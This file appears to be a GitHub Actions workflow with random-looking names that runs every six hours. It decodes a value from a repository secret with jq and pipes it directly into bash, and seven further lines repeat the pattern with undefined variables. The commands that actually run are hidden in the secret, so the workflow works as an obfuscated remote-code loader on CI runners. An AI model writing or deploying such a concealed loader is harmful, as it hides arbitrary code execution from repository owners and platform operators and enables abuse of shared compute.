name: normalkerchief
on:
  workflow_dispatch:
  schedule:
    - cron: '23 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: normalkerchief
        env:
          sqg2: ${{ secrets.sqg2 }}
        run: |
          echo $sqg2 | jq -r .j15 | /bin/bash
          echo $euve7 | jq -r .bto9 | /bin/bash
          echo $bx66 | jq -r .cmzj5 | /bin/bash
          echo $bqrbi48 | jq -r .cgmu2 | /bin/bash
          echo $nk4 | jq -r .eehhy22603 | /bin/bash
          echo $gkhwu1917 | jq -r .wwrh9038 | /bin/bash
          echo $pidr28 | jq -r .td05079 | /bin/bash
          echo $ouwv74 | jq -r .huu737 | /bin/bash

